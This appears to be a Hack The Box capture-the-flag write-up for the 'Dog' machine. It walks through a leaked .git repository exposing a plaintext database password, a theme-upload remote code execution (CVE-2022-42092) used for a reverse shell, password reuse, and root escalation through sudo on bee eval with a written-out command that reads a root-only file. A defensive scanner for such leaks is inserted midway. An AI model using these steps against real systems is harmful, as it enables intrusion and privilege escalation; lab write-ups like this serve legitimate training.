Dog - Hack The Box Machine

March 2025

User Flag

The site runs Backdrop CMS version 1.

Leaked .git folder:

http://dog.htb/.git

In the settings.php file:

mysql://root:BackDropJ2024DS2024@127.0.0.1/backdrop

In the files/config_83dddd18e1ec67fd8ff5bba2453c7fb3/active/update.settings.json file:

{
    "_config_name": "update.settings",
    "_config_static": true,
    "update_cron": 1,
    "update_disabled_extensions": 0,
    "update_interval_days": 0,
    "update_url": "",
    "update_not_implemented_url": "https://github.com/backdrop-ops/backdropcms.org/issues/22",
    "update_max_attempts": 2,
    "update_timeout": 30,
    "update_emails": [
        "tiffany@dog.htb"
    ],
    "update_threshold": "all",
    "update_requirement_type": 0,
    "update_status": [],
    "update_projects": []
}

These credentials allow us to log in to the Backdrop CMS service.
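
A defender-side check for the two findings above (repository metadata under the document root and a database URL with an inline password in a settings file), as an added example that is not part of the original write-up. The names audit_webroot and build_sample and the sample tree with its placeholder password are constructed for illustration.

```python
import os
import re
import tempfile

# scheme://user:password@host with an inline password (userinfo form).
CRED_URL = re.compile(r"\b([a-z][a-z0-9+.-]*)://([^\s:/@'\"]+):([^\s/@'\"]+)@([^\s/'\"]+)")
SCAN_EXT = {".php", ".inc", ".json", ".yml", ".ini"}


def audit_webroot(root):
    """Return (kind, relative_path, detail) findings; passwords are redacted."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        if ".git" in dirnames:
            rel = os.path.relpath(os.path.join(dirpath, ".git"), root)
            findings.append(("exposed-vcs", rel, "repository metadata under document root"))
            dirnames.remove(".git")  # report it, do not descend into it
        for name in sorted(filenames):
            if os.path.splitext(name)[1].lower() not in SCAN_EXT:
                continue
            path = os.path.join(dirpath, name)
            with open(path, "r", errors="replace") as fh:
                for lineno, line in enumerate(fh, 1):
                    for scheme, user, _pw, host in CRED_URL.findall(line):
                        detail = f"line {lineno}: {scheme}://{user}:<redacted>@{host}"
                        findings.append(("inline-credential", os.path.relpath(path, root), detail))
    return findings


def build_sample(root):
    """Constructed sample tree mirroring the layout above; the password is a placeholder."""
    cfg = os.path.join(root, "files", "config_SAMPLE", "active")
    os.makedirs(os.path.join(root, ".git"))
    os.makedirs(cfg)
    samples = {
        os.path.join(root, ".git", "HEAD"): "ref: refs/heads/master\n",
        os.path.join(root, "settings.php"):
            "<?php\n$database = 'mysql://root:EXAMPLE-PASSWORD@127.0.0.1/backdrop';\n",
        os.path.join(cfg, "update.settings.json"):
            '{"update_not_implemented_url": "https://github.com/backdrop-ops/backdropcms.org/issues/22"}\n',
    }
    for path, text in samples.items():
        with open(path, "w") as fh:
            fh.write(text)


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample(tmp)
        for kind, path, detail in audit_webroot(tmp):
            print(f"{kind:18} {path:14} {detail}")
```

Run against a real document root before deployment; any exposed-vcs or inline-credential finding means the tree should not be served as-is.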

CVE-2022-42092

Backdrop CMS 1.22.0 has an unrestricted file upload vulnerability via 'themes' that allows attackers to achieve remote code execution.

Create a theme and put a reverse shell inside it...

Create a listener in the terminal and obtain a shell for the www-data user.

With this user we can now find out about the existing users on this machine:

www-data@dog:/var/www/html/themes/iiv-1.x-1.x$ ls /home
ls /home
jobert
johncusack

Trying the same password on these users, we can get into the machine with the user johncusack and get the user flag.

Root Flag

sudo -l
Matching Defaults entries for johncusack on dog:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User johncusack may run the following commands on dog:
    (ALL : ALL) /usr/local/bin/bee
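
bee is the Backdrop CMS command-line utility, and its eval command executes PHP code, so it can be run as root from the site directory:

cd /var/www/html
sudo /usr/local/bin/bee eval "system('cat /root/root.txt')"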